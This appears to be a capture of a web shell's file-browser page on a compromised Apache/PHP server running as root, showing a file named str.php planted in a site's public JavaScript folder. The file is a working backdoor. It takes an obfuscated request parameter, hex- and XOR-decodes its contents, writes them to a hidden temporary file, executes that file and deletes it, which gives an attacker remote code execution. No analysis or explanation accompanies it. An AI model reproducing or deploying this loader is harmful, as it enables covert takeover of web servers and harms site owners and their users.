HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /var/www/html/eva.sumar.com.py/public/frontend/js/str.php
<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["\x65\x6Etry"])){
	$descriptor = hex2bin($_REQUEST["\x65\x6Etry"]);
	$rec= '' ;foreach(str_split($descriptor) as $char){$rec .= chr(ord($char) ^ 37);}
	$reference = array_filter([sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getcwd(), getenv("TEMP"), "/var/tmp", getenv("TMP")]);
	foreach ($reference as $tkn) {
    		if ((is_dir($tkn) and is_writable($tkn))) {
    $value = implode("/", [$tkn, ".itm"]);
    if (file_put_contents($value, $rec)) {
	require $value;
	unlink($value);
	exit;
}
}
}
}